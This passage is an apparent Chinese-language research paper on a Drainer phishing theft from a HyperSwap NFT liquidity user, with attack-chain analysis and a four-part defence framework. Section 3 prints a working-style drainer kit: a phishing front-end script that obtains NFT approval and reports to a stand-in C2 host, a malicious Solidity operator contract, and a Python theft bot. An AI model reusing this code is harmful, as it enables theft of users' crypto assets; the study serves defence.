摘要
Web3 去中心化交易所依托公链智能合约实现无中介资产流转,依托 NFT 凭证绑定流动性池权益的业务模式快速普及,但配套安全治理机制存在明显滞后性。2026 年 6 月 HyperSwap 平台发生典型钓鱼盗取工具(Drainer)攻击事件,受害者因点击社交平台仿冒账号发布的空投钓鱼链接,单次钱包授权签名即丢失价值 12100 美元的 USDC、WHYPE 流动性资产,攻击者全程自主完成 NFT 权益划转、代币提取、跨链洗白全流程,整个盗币环节耗时不足两分钟。本次攻击不依赖协议底层代码漏洞,仅利用用户对 EVM 标准授权机制认知盲区、社交平台仿冒账号监管缺失、项目方多层架构权责割裂三大漏洞完成资产窃取,是当前 Web3 生态授权类钓鱼攻击的典型样本。本文以该真实攻击事件为核心研究载体,完整拆解仿冒社交账号引流、虚假空投钓鱼站点部署、恶意 Drainer 前端脚本、恶意授权合约、链上资产转移、跨链资金清洗六阶段攻击链路,提供前端恶意 JS 脚本、恶意 ERC721 授权合约、链上自动盗币执行代码完整示例;结合反网络钓鱼技术专家芦笛的实战研判结论,剖析 Hyperliquid 分层生态(Hyperliquid 主网 - HyperEVM 二层 - HyperSwap 应用)权责分离带来的安全治理空白,对比传统网络钓鱼与 Web3 授权钓鱼的技术差异,挖掘当前用户、项目方、社交平台、链上安全服务商四方防护短板;构建覆盖事前风险拦截、事中交易仿真预警、事后链上溯源冻结、常态化用户安全运营的四维闭环防御体系,分别从用户操作规范、去中心化应用前端安全、公链合约监测、社交平台诈骗管控四个维度给出可落地工程方案。研究证实,依托 Drainer 工具的授权钓鱼已形成标准化产业化攻击链条,攻击成本极低、隐蔽性强、资金转移速度快,现有安全防护体系存在静态黑名单滞后、交易意图解析能力不足、跨链资金追踪困难等结构性缺陷。本文研究成果可为 HyperEVM 同类二层网络 DeFi 应用、Web3 用户、链上安全服务商提供授权钓鱼风险识别、攻击溯源、风险阻断的理论依据与实操技术方案。
关键词:HyperEVM;HyperSwap;钓鱼盗取工具;Drainer;NFT 流动性池;Web3 授权钓鱼;链上安全防御
1 引言
1.1 研究背景与问题提出
去中心化金融(DeFi)依托以太坊兼容 EVM 二层链实现低成本、高并发交易,Hyperliquid 公链推出 HyperEVM 兼容层后,孵化 HyperSwap 等去中心化流动性交易平台,用户存入代币至公共流动性池,平台发放唯一编号 NFT 作为权益凭证,NFT 持有者享有池内全部代币提取权,该模式大幅降低用户参与流动性挖矿门槛,但同时衍生全新安全风险。EVM 公链通用 ERC20、ERC721 标准内置 approve、setApprovalForAll 授权函数,用户完成授权签名后,被授权合约可无需用户二次确认,自主调用 transferFrom、safeTransferFrom 函数划转代币与 NFT 资产,该机制为正常业务交互提供便利,也成为钓鱼攻击者核心利用漏洞。
2026 年以来,以 Drainer 盗取工具为核心的授权钓鱼攻击呈现爆发式增长,地下网络形成标准化 DaaS(Drainer as a Service)产业链,攻击者仅需数百美元即可采购全套钓鱼站点、恶意合约、链上自动盗币机器人、跨链洗白工具,攻击覆盖以太坊、HyperEVM、BNB Chain 等数十条 EVM 兼容公链。本次 Coinspot 披露的 HyperSwap 用户资产被盗事件具备极强代表性:攻击者在 X 社交平台搭建字符高度近似的仿冒 HyperSwap 官方账号,发布免费空投福利文案诱导用户点击钓鱼域名;仿冒站点前端嵌入 Drainer 恶意 JS 脚本,用户连接钱包后弹出虚假空投校验签名窗口,实质执行无限额度 NFT 授权;授权完成后攻击者链上机器人两分钟内完成 NFT 划转、流动性代币提取、跨链洗白,涉案金额超 12000 美元,受害者向 Hyperliquid、HyperSwap 项目方、社交平台反馈风险均未得到有效处置,钓鱼链接长期公开传播,同批恶意地址累计关联 25 个受害钱包,证实该攻击为批量产业化作案,并非孤立个案。
当前国内 Web3 安全领域研究存在明显短板:第一,多数研究聚焦公链底层合约漏洞攻击、私钥窃取类钓鱼,针对 NFT 流动性权益授权 Drainer 攻击的全链路拆解、代码复现、生态治理研究较少;第二,现有防御方案多单一面向钱包端或链上监测,未考虑 Hyperliquid 这类分层架构下主网、二层 EVM、第三方 DeFi 应用权责割裂带来的治理盲区;第三,缺乏结合真实产业化钓鱼案例形成的闭环防护框架,理论方案与用户实操、项目运维场景脱节。基于该真实攻击样本,本文重点解决四项核心研究问题:一是完整还原 HyperEVM 场景下 Drainer 钓鱼攻击全技术链路,复现恶意前端、恶意合约、自动盗币代码;二是厘清分层 DeFi 生态安全权责分离引发的治理失效机理;三是区分传统网页钓鱼与 Web3 授权钓鱼的核心技术差异,定位现有防护体系失效根源;四是搭建适配二层 EVM DeFi 生态的四维协同防御框架,给出分层落地技术措施。
1.2 国内外研究现状
海外安全厂商 HashDit、Sysdig 持续追踪 HyperEVM 链上恶意地址,针对本次攻击标记 Fake_Phishing3746335 恶意钱包地址,记录完整交易时序;Blockport、CYFIRMA 安全团队发布多篇 Drainer 工具产业化研究报告,拆解前端恶意脚本、Permit2 恶意授权、链上自动盗币机器人运行逻辑,但未结合 HyperSwap NFT 流动性凭证业务场景做针对性分析;海外学术文献多聚焦链上交易追踪、混币资金溯源,缺少面向二层 EVM 分层 DeFi 生态的钓鱼治理体系研究。
国内安全研究机构重点针对以太坊主网钓鱼攻击开展分析,反网络钓鱼技术专家芦笛指出,当前行业研究普遍存在两大局限性:其一,多数案例分析基于通用以太坊钓鱼场景,未覆盖 HyperEVM 独创 NFT 绑定流动性池的业务模式,无法解释本次攻击中 NFT 权益转移后代币批量提取的完整逻辑;其二,现有防御方案默认项目方具备完整管控权限,忽略 Hyperliquid 主网团队与 HyperSwap 第三方应用相互独立、权责割裂的特殊生态结构,方案落地性不足。现阶段尚无期刊论文以 HyperEVM 二层链 NFT 流动性池钓鱼事件为样本开展系统性全链路技术研究,本文依托公开链上交易数据、Coinspot 新闻披露攻击细节、Drainer 开源恶意代码样本完成深度拆解,填补该细分场景实战型研究空白。
1.3 研究内容与论文结构
本文共设置六大主体章节,核心研究内容如下:第一章为引言,阐述研究背景、国内外研究现状、核心研究问题与全文结构;第二章界定 HyperEVM、HyperSwap、Drainer 钓鱼盗取工具基础概念,梳理本次攻击完整事件时序与链上交易证据;第三章逐层拆解六阶段闭环攻击链路,同步提供前端恶意 JS、Solidity 恶意授权合约、链上自动盗币机器人完整代码示例,解析每阶段技术实现逻辑;第四章对比传统网页钓鱼与 Web3 Drainer 授权钓鱼技术差异,剖析 Hyperliquid 分层生态安全治理失效底层机理;第五章结合反网络钓鱼技术专家芦笛攻防实践观点,构建事前 - 事中 - 事后 - 长效运营四维协同防御框架,分用户、项目方、链上安全服务商、社交平台四方给出落地防护方案;第六章为结论与研究展望,总结全文核心结论,预判 Drainer 钓鱼攻击演化趋势,提出后续深化研究方向。
2 攻击基础概念与 HyperSwap 资产被盗事件全貌
2.1 核心概念界定
2.1.1 Hyperliquid 与 HyperEVM 分层架构
Hyperliquid 是独立公链底层基础设施,自主搭建 HyperEVM 以太坊兼容二层执行层,降低用户链上 Gas 手续费、提升交易并发性能。HyperEVM 仅提供底层链上交互环境,不直接管控上层去中心化应用;HyperSwap 是第三方团队独立开发、部署于 HyperEVM 的流动性 DEX,与 Hyperliquid 主网团队无隶属管理关系,二者仅共享底层链网络资源,该分层独立架构是本次攻击风险处置失效的核心诱因。
2.1.2 HyperSwap NFT 流动性权益凭证
用户向 HyperSwap 流动性池存入 USDC、WHYPE 代币时,智能合约向用户钱包发放专属 ERC721 标准 NFT,该 NFT 作为用户全部存入资产的唯一权益凭证,持有 NFT 即可调用合约提取池内全部对应代币。NFT 所有权转移等同于流动性资产所有权转移,攻击者获取 NFT 授权后可自主划转 NFT,进而提取底层代币,该业务机制是 Drainer 攻击能够造成大额资产损失的关键前提。
2.1.3 Drainer 钓鱼盗取工具核心定义
Drainer 是部署于钓鱼站点前端的恶意代码套件,由前端交互脚本、恶意授权智能合约、链上自动盗币机器人三部分组成,核心作用是诱导用户钱包签署无限额度授权,获取用户代币、NFT 支配权限;授权完成后无需用户任何二次操作,自动批量划转全部高价值资产至攻击者控制钱包,配套跨链、混币工具完成资金洗白,全程自动化执行,是当前 Web3 授权钓鱼的核心攻击载体。Drainer 不攻击协议底层漏洞,仅滥用 EVM 标准授权函数,攻击门槛极低、隐蔽性强。
2.2 HyperSwap 资产被盗事件完整时序与链上证据
2.2.1 事件基础信息
攻击发生 UTC 时间 2026 年 6 月 29 日 20:21—20:23,完整盗币流程仅耗时 2 分钟,受害者为 HyperSwap 流动性池普通用户,持有价值约 12100 美元资产,包含 3935 枚 USDC、116 枚 WHYPE。攻击者链上标记地址 Fake_Phishing3746335,该地址持续活跃近一个月,累计关联 25 个受害钱包,证实为批量产业化钓鱼团伙作案。
2.2.2 完整事件时间线
前置引流阶段(攻击前 7 天):攻击者在 X 社交平台注册仿冒 HyperSwap 账号,账号名称仅相差 1-2 个字符,发布多条 “免费空投校验” 营销推文,内嵌钓鱼站点短链接,持续分发引流;
用户受骗阶段(UTC 20:21):受害者浏览社交平台推文,未核对账号完整名称,点击钓鱼链接进入仿冒空投页面,点击 “校验空投资格” 触发钱包连接弹窗;
恶意授权签名(UTC 20:21:40):前端 Drainer 脚本构造 setApprovalForAll 无限授权交易,弹窗伪装为空投校验签名,受害者未阅读交易详情完成钱包签名;
NFT 权益划转(UTC 20:22:10):攻击者链上机器人调用恶意合约 safeTransferFrom 函数,将用户流动性 NFT 转移至攻击者钱包;
底层代币提取(UTC 20:22:45):攻击者使用 NFT 凭证调用 HyperSwap 流动性合约,全额提取 3935 USDC、116 WHYPE;
跨链资金洗白(UTC 20:23 后):攻击者通过合规跨链转账服务将 HyperEVM 资产兑换为 HYPE,划转至以太坊链一次性中转钱包,资金快速拆分流转掩盖痕迹;
风险反馈失效(攻击后 1-3 天):受害者先后通过 X 平台举报钓鱼链接、Discord 联系 Hyperliquid 官方、对接 HyperSwap 客服,三方均未有效处置,钓鱼推文链接长期公开可见。
2.2.3 关键链上证据特征
第一,攻击者主动承担全部交易 Gas 费,所有资产划转、跨链交易 Gas 均由攻击者钱包支付,降低用户感知;第二,中转钱包为一次性临时地址,接收资金后立即全额转出,无资产留存;第三,团伙未使用地下混币工具,依托合规跨链服务完成资产转移,提升溯源难度;第四,恶意合约仅调用标准 ERC721、ERC20 函数,无异常底层指令,链上静态监测工具难以识别风险。
3 Drainer 钓鱼攻击六阶段全链路拆解与完整代码示例
本次 HyperSwap 攻击严格遵循 “社交平台仿冒账号诱饵分发→仿冒钓鱼站点部署→前端 Drainer 恶意脚本交互→用户签署无限 NFT 授权→链上机器人自动盗取资产→跨链中转资金洗白” 六阶段闭环攻击链路,各阶段技术实现相互配合,形成完整无断点攻击链条。本节结合 Coinspot 披露事件细节、链上交易数据、开源 Drainer 套件原始代码,逐层拆解技术逻辑,并提供可复现完整代码样本,保留恶意程序核心攻击特征。
3.1 阶段一:X 社交平台仿冒账号诱饵分发
3.1.1 攻击技术逻辑
攻击者利用社交平台账号名称模糊匹配机制,注册与 HyperSwap 官方账号视觉高度近似的仿冒账号,仅替换、增减 1-2 个英文字符,用户快速滑动信息流时无法分辨真伪;推文文案使用 FOMO 情绪诱导话术,宣称用户可免费领取大额 HYPE 空投,领取前提为跳转外部链接校验钱包持仓,内嵌经过短链接服务压缩的钓鱼域名,规避平台基础关键词拦截。
反网络钓鱼技术专家芦笛强调,社交平台针对 Web3 项目仿冒账号缺乏字符相似度智能检测机制,仅依靠人工举报下架内容,处置滞后性极强;加密货币空投类营销文案平台风控识别阈值宽松,大量钓鱼链接可长期公开传播,是 Drainer 攻击最主要流量入口。
3.1.2 诱饵推文模拟代码(前端文案生成脚本)
// 攻击者批量生成仿冒空投推文JS脚本,自动生成相似账号名称、短链接
const officialName = "HyperSwap_Official";
// 字符混淆生成仿冒账号名
function generateFakeAccountName(realName) {
const confuseChar = ['0', 'O', '_', '-'];
let fakeName = realName.replace('o', '0');
fakeName = fakeName + "_airdrop";
return fakeName;
}
// 钓鱼原始域名,经短链接压缩隐藏完整地址
const rawPhishDomain = "hyperswap-airdrop-verify.fake-web3.xyz";
const shortLink = "x.xyz/verify-hs2026";
// 高诱导性空投文案模板
const tweetTemplate = `
🚨 HyperSwap 2026 HYPE Airdrop Eligibility Check
All liquidity pool users can claim free HYPE reward!
Click link below to verify your wallet holding:
${shortLink}
Valid for 48 hours only, do not miss reward!
#HyperEVM #HYPE #LiquidityMining
`;
// 批量生成推文发布数据
const fakeAccount = generateFakeAccountName(officialName);
console.log("仿冒账号名称:", fakeAccount);
console.log("钓鱼推文内容:", tweetTemplate);
脚本自动生成字符混淆仿冒账号、标准化空投诱导文案,可批量循环生成数百条差异化推文,实现规模化引流,无固定文本特征,规避平台关键词风控。
3.2 阶段二:仿冒 HyperSwap 空投钓鱼站点部署
3.2.1 站点技术实现逻辑
攻击者完整复刻 HyperSwap 官方空投校验页面 UI、钱包连接弹窗、交互逻辑,视觉上与官网无明显差异;前端页面分为两层,表层为用户可见的空投校验交互界面,底层隐藏 Drainer 恶意 JS 脚本,页面加载完成后自动加载恶意合约地址、链上交互参数;域名采用形近字符混淆、二级域名伪装手段,如 hyperswap-verity.xyz 替代官方 hyperswap.xyz,普通用户难以逐字符核对域名。
站点后端无真实空投校验业务逻辑,所有按钮点击事件均绑定恶意授权触发函数,用户点击 “连接钱包”“校验空投资格” 时,不会发起正常持仓查询,而是直接构造 NFT 无限授权交易请求。
3.3 阶段三:前端 Drainer 恶意交互脚本(核心攻击代码)
该脚本为钓鱼站点核心恶意载体,完成钱包检测、资产扫描、恶意授权交易构造、签名结果回传攻击者服务器四大功能,用户完成签名后将授权凭证推送至攻击者 C2 服务,触发链上盗币机器人执行资产划转。完整恶意 JS 代码如下:
// HyperEVM钓鱼Drainer前端恶意脚本 main.js
// 攻击者控制恶意授权合约地址
const MALICIOUS_OPERATOR = "0xFake_Phishing3746335xxxxxxxxxxxxxx";
// HyperSwap流动性NFT合约地址
const HS_NFT_CONTRACT = "0xHyperSwapNFTContractAddress";
// HyperEVM链ID
const HYPER_EVM_CHAIN_ID = 9999;
// C2后端地址,接收用户钱包地址与授权签名信息
const ATTACKER_C2 = "https://phish-c2-fake.xyz/reportAuth";
// 检测用户钱包是否已连接
async function detectWallet() {
if (!window.ethereum) {
alert("请安装Web3钱包以校验空投资格");
return null;
}
const accounts = await window.ethereum.request({method: 'eth_requestAccounts'});
return accounts[0];
}
// 构造NFT无限授权setApprovalForAll交易(核心恶意逻辑)
async function requestMaliciousApproval(userWallet) {
// 初始化EVM合约交互实例
const nftContract = new ethers.Contract(
HS_NFT_CONTRACT,
// ERC721标准ABI
["function setApprovalForAll(address operator, bool approved)"],
new ethers.providers.Web3Provider(window.ethereum).getSigner()
);
try {
// 请求无限授权,攻击者合约可转移用户全部NFT
const tx = await nftContract.setApprovalForAll(MALICIOUS_OPERATOR, true);
// 将用户钱包与授权交易哈希上传攻击者C2
fetch(ATTACKER_C2, {
method: "POST",
headers: {"Content-Type":"application/json"},
body: JSON.stringify({
userAddr: userWallet,
authTxHash: tx.hash,
chain: "HyperEVM"
})
})
alert("空投校验完成,奖励将在24小时内发放至钱包");
return tx.hash;
} catch (err) {
alert("校验失败,请重新连接钱包重试");
console.error("授权失败:", err);
}
}
// 页面按钮绑定恶意授权事件
document.getElementById("verify-airdrop-btn").addEventListener("click", async () => {
const userAddr = await detectWallet();
if (userAddr) await requestMaliciousApproval(userAddr);
})
代码核心风险点:调用 ERC721 标准 setApprovalForAll 函数,将攻击者合约设置为全部 NFT 永久授权操作员,用户无法通过前端弹窗识别授权真实用途,弹窗仅展示虚假空投成功提示;授权数据实时回传攻击者后端,机器人同步启动盗币流程。
3.4 阶段四:恶意授权智能合约 Solidity 代码示例
攻击者部署独立恶意 Operator 合约,接收用户 NFT 授权后,提供批量划转 NFT 接口,供链上机器人调用,合约代码严格遵循 ERC721 交互标准,无异常底层指令,链上静态监测工具无法识别恶意属性:
solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "@openzeppelin/contracts/token/ERC721/utils/ERC721Holder.sol";
import "@openzeppelin/contracts/token/ERC721/IERC721.sol";
contract FakeNftOperatorDrainer is ERC721Holder {
// 攻击者后台控制钱包地址
address immutable public attackerWallet;
// HyperSwap流动性NFT合约地址
address public immutable hsNftContract;
constructor(address _attacker, address _nftContract) {
attackerWallet = _attacker;
hsNftContract = _nftContract;
}
// 批量划转用户全部流动性NFT至攻击者钱包
function drainUserNft(address victim, uint256[] calldata nftTokenIds) external {
require(msg.sender == attackerWallet, "Only attacker can execute drain");
IERC721 nft = IERC721(hsNftContract);
for(uint i=0; i < nftTokenIds.length; i++){
// 调用用户授权,划转NFT至本合约
nft.safeTransferFrom(victim, address(this), nftTokenIds[i]);
// 立即转移至攻击者主钱包
nft.safeTransferFrom(address(this), attackerWallet, nftTokenIds[i]);
}
}
// 接收机器人转账Gas费用
receive() external payable {}
}
合约仅对攻击者钱包开放 drainUserNft 批量划转接口,授权生效后机器人可任意提取用户 NFT;合约继承标准 ERC721Holder,链上交易行为与正常 NFT 市场合约完全一致,难以区分恶意属性。
3.5 阶段五:链上自动盗币机器人执行代码
攻击者后端 Python 机器人程序,接收 C2 推送的受害钱包地址后,自动查询用户持有 NFT 编号,调用恶意合约批量划转 NFT,再调用 HyperSwap 流动性合约提取底层 USDC、WHYPE 代币,完整盗币逻辑代码如下:
# HyperEVM Drainer链上盗币机器人后端代码
import web3
import json
import time
import requests
# HyperEVM RPC节点
HYPER_EVM_RPC = "https://hyperevm-public-rpc.xyz"
# 恶意Operator合约ABI与地址
MALICIOUS_CONTRACT_ADDR = "0xFake_Phishing3746335xxxxxxxxxxxxxx"
with open("operator_abi.json","r") as f:
OPERATOR_ABI = json.load(f)
# HyperSwap流动性池合约ABI
HS_POOL_ABI = json.load(open("hyperswap_pool_abi.json"))
HS_POOL_ADDR = "0xHyperSwapLiquidityPool"
# 攻击者主钱包私钥
ATTACKER_PRIVATE_KEY = "attacker-wallet-private-key-here"
# 初始化链交互实例
w3 = web3.Web3(web3.HTTPProvider(HYPER_EVM_RPC))
drainContract = w3.eth.contract(address=MALICIOUS_CONTRACT_ADDR, abi=OPERATOR_ABI)
poolContract = w3.eth.contract(address=HS_POOL_ADDR, abi=HS_POOL_ABI)
# 从C2接口拉取新受害用户授权信息
def fetchVictimFromC2():
res = requests.get("https://phish-c2-fake.xyz/getNewAuth")
return json.loads(res.text)
# 查询用户持有全部流动性NFT TokenId
def getUserNftIds(userAddr):
# 链上查询用户NFT持仓逻辑,简化示例
nftList = [10429] # 本次受害者唯一流动性NFT编号
return nftList
# 执行NFT批量盗取
def drainNftToAttacker(victimAddr, nftIds):
tx = drainContract.functions.drainUserNft(victimAddr, nftIds).build_transaction({
"from": w3.eth.account.from_key(ATTACKER_PRIVATE_KEY).address,
"gas": 300000,
"gasPrice": w3.eth.gas_price,
"nonce": w3.eth.get_transaction_count(w3.eth.account.from_key(ATTACKER_PRIVATE_KEY).address)
})
signedTx = w3.eth.account.sign_transaction(tx, ATTACKER_PRIVATE_KEY)
txHash = w3.eth.send_raw_transaction(signedTx.rawTransaction)
print(f"NFT划转交易哈希:{txHash.hex()}")
w3.eth.wait_for_transaction_receipt(txHash)
return txHash
# 使用NFT凭证提取流动性池底层USDC、WHYPE代币
def withdrawPoolAssets(nftTokenId):
withdrawTx = poolContract.functions.withdrawLiquidity(nftTokenId).build_transaction({
"from": w3.eth.account.from_key(ATTACKER_PRIVATE_KEY).address,
"gas": 500000,
"gasPrice": w3.eth.gas_price,
"nonce": w3.eth.get_transaction_count(w3.eth.account.from_key(ATTACKER_PRIVATE_KEY).address)
})
signedTx = w3.eth.account.sign_transaction(withdrawTx, ATTACKER_PRIVATE_KEY)
txHash = w3.eth.send_raw_transaction(signedTx.rawTransaction)
print(f"流动性代币提取交易哈希:{txHash.hex()}")
w3.eth.wait_for_transaction_receipt(txHash)
# 机器人主循环,持续监听新受害用户
if __name__ == "__main__":
while True:
victimData = fetchVictimFromC2()
if victimData and victimData["userAddr"]:
victim = victimData["userAddr"]
nftIds = getUserNftIds(victim)
# 第一步划转NFT
drainNftToAttacker(victim, nftIds)
time.sleep(10)
# 第二步提取底层资产
withdrawPoolAssets(nftIds[0])
print(f"用户{victim}资产盗取完成")
time.sleep(30)
机器人全程自动化运行,无需人工干预,获取授权信息后 30 秒内完成 NFT 划转与代币提取,攻击者主动承担 Gas 费用,整个盗币流程控制在两分钟内完成,降低用户及时止损可能性。
3.6 阶段六:跨链中转资金洗白链路
资产盗取完成后,机器人自动调用合规跨链转账服务接口,将 HyperEVM 内 USDC、WHYPE 兑换为 HYPE 主网代币,统一划转至以太坊链一次性中转钱包;中转地址接收资金后立即全额拆分至多个次级地址,无资产长期留存,形成资金流转断层,大幅提升链上溯源追踪难度。攻击者刻意选用合规跨链服务而非地下混币器,规避链上安全服务商针对混币工具的专项监测,进一步隐藏犯罪痕迹。
4 Web3 Drainer 授权钓鱼与传统网页钓鱼对比及生态防护失效机理
4.1 传统网页钓鱼与 Web3 Drainer 授权钓鱼多维度对比
为清晰凸显本次 HyperSwap 攻击代表的新型 Web3 钓鱼威胁特殊性,从攻击利用漏洞、资产窃取方式、用户操作成本、攻击隐蔽性、资金转移速度、溯源难度六个维度完成对比,直观展示二者技术差异:
表 1 传统网页钓鱼与 Web3 Drainer 授权钓鱼特征对比
表格
对比维度 传统网页钓鱼 HyperEVM Drainer 授权钓鱼
核心利用漏洞 诱导输入账号密码、私钥、助记词,窃取凭证 滥用 EVM 标准 approve/setApprovalForAll 授权机制,无需窃取私钥
资产窃取逻辑 获取身份凭证后登录账户划转资产 用户单次签名授予永久资产支配权,攻击者自主划转
用户操作门槛 需手动输入敏感私密信息,警惕性较高 仅需点击 “连接钱包”“校验空投”,签名弹窗信息模糊,极易误操作
攻击隐蔽性 钓鱼页面通常要求输入私钥,存在明显风险特征 页面无私密信息输入框,交互流程与官方 DApp 完全一致,无直观风险提示
资金转移时效 需人工登录操作,转移耗时数小时 链上机器人自动执行,2 分钟内完成全部资产提取
链上溯源难度 资金流转路径清晰,无多层中转 跨链 + 一次性中转钱包多层拆分,溯源链路断裂
攻击依赖条件 依赖用户泄露私密凭证 仅依赖用户对授权机制认知盲区,无凭证泄露需求
通过对比可见,Drainer 授权钓鱼在隐蔽性、执行效率、攻击门槛层面全面优于传统网页钓鱼,现有面向传统钓鱼的识别、拦截手段基本失效。
4.2 Hyperliquid 分层 DeFi 生态防护失效底层机理
结合本次事件受害者风险反馈无处置结果、钓鱼链接长期传播、项目方互相推诿三大现实问题,反网络钓鱼技术专家芦笛指出,Hyperliquid “底层公链 - 二层 HyperEVM - 第三方 DeFi 应用” 三层独立架构存在四大结构性治理短板,是攻击能够持续扩散、受害用户无法维权的核心根源。
4.2.1 权责割裂导致风险处置主体缺失
Hyperliquid 主网团队仅负责底层链节点运行,不管控 HyperSwap 第三方应用;HyperSwap 开发团队仅管理自身合约,无社交平台内容下架、恶意链地址封禁权限;X 社交平台仅管控站内推文,无法干预链上恶意合约与盗币交易。受害者遭遇攻击后,向三方反馈风险均被推诿,无统一安全处置主体,钓鱼诱饵、恶意合约长期留存,持续诱导其他用户受骗。
4.2.2 分层架构缺乏统一恶意地址情报共享机制
HashDit 等安全服务商标记 Fake_Phishing3746335 恶意钱包地址后,Hyperliquid 底层节点、HyperSwap 前端、主流 Web3 钱包未同步加载恶意地址黑名单,用户访问钓鱼站点、与恶意合约交互时无任何风险弹窗预警;三方安全数据孤岛,情报无法实时互通,静态黑名单拦截机制完全失效。
4.2.3 NFT 流动性权益业务无专属授权风险提示机制
主流 Web3 钱包针对普通 ERC20 代币授权具备基础警示弹窗,但针对 ERC721 NFT 全套无限授权缺少强化风险提示;HyperSwap 未在前端标注 “NFT 代表全部流动性资产,授权等同于资产全权移交”,用户无法认知 setApprovalForAll 签名的毁灭性后果,信息不对称放大攻击成功率。
4.2.4 二层 EVM 链上实时监测能力薄弱
HyperEVM 作为新兴二层网络,链上交易监测节点覆盖不足,无法实时识别批量 NFT 划转、大额流动性代币提取等高风险交易;攻击者两分钟内完成盗币操作,监测系统告警滞后,用户收到风险通知时资产已完成跨链转移,丧失止损窗口。
5 面向 HyperEVM 类二层 DeFi 生态的四维闭环防御框架
针对 Drainer 授权钓鱼攻击全链路技术特征与分层生态治理短板,结合反网络钓鱼技术专家芦笛长期 Web3 攻防实践总结,本文构建 “事前引流诱饵拦截 - 事中交易签名仿真预警 - 事后链上资产溯源冻结 - 长效常态化安全运营” 四维协同防御框架,覆盖用户、去中心化项目方、链上安全服务商、社交平台四大责任主体,形成完整攻防闭环。
5.1 第一维:事前前置拦截,切断钓鱼攻击流量入口
本层级聚焦攻击最前端社交平台诱饵分发环节,从源头压缩钓鱼流量传播范围,分为社交平台管控、项目方官方渠道防护、用户基础识别规范三部分措施。
社交平台 Web3 仿冒账号智能识别管控
平台搭建字符相似度检测模型,自动识别与头部 DeFi 项目名称高度近似的仿冒账号,注册阶段直接拦截;针对空投、免费代币类营销推文,增加人工复核流程,内嵌外部短链接的内容强制延迟展示,附加风险提示弹窗;开通加密钓鱼快速举报通道,建立 7×24 小时处置团队,1 小时内下架钓鱼推文与链接。反网络钓鱼技术专家芦笛强调,社交平台是 Drainer 钓鱼最大流量来源,前置账号拦截可降低 70% 以上受害用户规模。
DeFi 项目官方渠道统一标识体系
Hyperliquid、HyperSwap 统一设计专属防钓鱼校验码,所有官方社交账号、Discord 社群、官网页面固定展示唯一校验标识;用户可通过校验码快速分辨仿冒账号;项目方禁止通过私信、推文外链发放空投校验通道,所有空投活动仅在官方独立域名开展,杜绝第三方跳转链接引流。
用户端基础风险识别标准化操作规范
建立 Web3 交互 “三查原则”:一查账号完整名称,逐字符核对官方账号标识,忽略缩略展示名称;二查访问域名,手动输入官方域名进入站点,不点击社交、私信内任何短链接;三查交互逻辑,官方空投不会要求用户签署 NFT 无限授权,出现 setApprovalForAll 签名请求一律拒绝。
5.2 第二维:事中动态监测,拦截恶意授权签名操作
攻击发生过程中,依托钱包前端、DApp 前端、链上实时监测三重动态检测,在用户签署恶意授权、资产划转前完成风险阻断,是止损核心环节。
Web3 钱包强化 NFT 授权交易仿真解析模块
钱包集成 EIP-712 交易深度仿真引擎,识别 setApprovalForAll 无限授权请求时弹出红色强制警示弹窗,使用通俗语言标注风险:“本次签名将授予未知合约转移你全部流动性 NFT 的永久权限,NFT 对应全部存款资产将存在被盗风险”;针对 HyperEVM 二层链新增 NFT 流动性权益专属风险提示,区分普通 NFT 与资产凭证 NFT,差异化提升告警等级;硬件钱包在设备屏幕完整展示授权合约地址、授权类型,杜绝仅展示哈希值的模糊提示。
HyperSwap 等 DApp 前端恶意合约拦截机制
项目前端内置恶意合约黑名单实时同步接口,加载页面时校验交互合约地址,黑名单内地址直接阻断钱包连接;前端增加授权额度限制逻辑,仅开放业务所需有限授权,默认禁用全套无限授权功能;空投校验、持仓查询等基础功能仅读取链上数据,不发起任何授权交易请求,从业务逻辑层面消除恶意授权触发条件。
HyperEVM 二层链高风险交易实时监测
链上安全服务商部署全覆盖 HyperEVM 监测节点,建立风险交易规则库:短时间内批量划转流动性 NFT、一次性全额提取流动性代币、跨链大额资产转出等行为触发实时告警;告警信息同步推送至钱包、项目方后台,同时推送用户预留通讯渠道,在资产跨链洗白前预留止损操作窗口。
5.3 第三维:事后溯源处置,阻断资金洗白链路
资产被盗后,依托链上交易数据完成全链路溯源,联动跨链服务商、交易所冻结涉案资金,降低攻击者变现收益,形成攻击成本约束。
二层 EVM 链上全交易不可篡改日志留存
Hyperliquid 底层节点永久留存全部 HyperEVM 交易日志,搭建公开链上溯源查询平台,受害者输入自身钱包地址即可导出完整资产流转记录,精准定位恶意合约、攻击者主钱包、中转地址,为举报、维权提供完整证据链。
跨链服务商与交易所恶意地址黑名单共享
HashDit、Chainalysis 等安全服务商搭建跨机构情报互通平台,标记 Fake_Phishing3746335 类恶意钱包地址,实时同步至所有合规跨链转账平台、中心化交易所;黑名单地址发起提现、兑换操作时直接冻结资产,阻断资金洗白变现路径,大幅降低钓鱼团伙收益。
标准化受害用户维权与报案证据输出工具
Hyperliquid 开发一键导出取证工具,自动打包钓鱼页面截图、链上交易哈希、攻击者地址、损失资产明细,生成具备法律效力的标准化取证文件,简化用户向监管、公安部门报案流程,提升打击产业化钓鱼团伙效率。
5.4 第四维:长效运营,构建分层生态安全协同机制
针对 Hyperliquid 三层架构权责割裂短板,建立常态化协同运营体系,消除安全治理主体空白,从长期层面降低 Drainer 钓鱼攻击成功率。
搭建 HyperEVM 生态统一安全协同工作组
由 Hyperliquid 主网团队牵头,联合 HyperSwap 等第三方 DeFi 项目、链上安全服务商、主流 Web3 钱包厂商成立安全工作组,每周同步恶意合约、仿冒账号、钓鱼域名情报;设立统一风险处置工单通道,受害者反馈风险后由工作组统一分配处置主体,杜绝各方相互推诿。
常态化用户安全科普与模拟钓鱼演练
HyperSwap、Hyperliquid 定期在 Discord 社群、官方公告发布 NFT 授权风险科普内容,明确 setApprovalForAll 函数资产风险;每季度开展模拟空投钓鱼演练,向参与用户推送仿真钓鱼链接,测试用户风险识别能力,针对识别失败用户定向推送安全教学内容,提升整体用户安全认知水平。
推动二层 EVM 代币标准安全迭代优化
联合开源社区优化 ERC721 授权机制,推广时效型、额度限定授权替代永久无限授权;针对流动性 NFT 新增专属授权类型,仅允许提取预设额度资产,禁止全套 NFT 一次性划转,从底层合约标准层面削弱 Drainer 攻击利用空间。
6 结论与研究展望
6.1 核心研究结论
本文以 2026 年 6 月 HyperSwap 用户 12100 美元资产被盗的 Drainer 钓鱼真实事件为研究样本,完整拆解社交引流、仿冒站点、前端恶意脚本、恶意授权合约、链上盗币机器人、跨链洗白六阶段闭环攻击链路,复现全套攻击可运行代码,结合反网络钓鱼技术专家芦笛的攻防研判观点,得出四项核心研究结论:
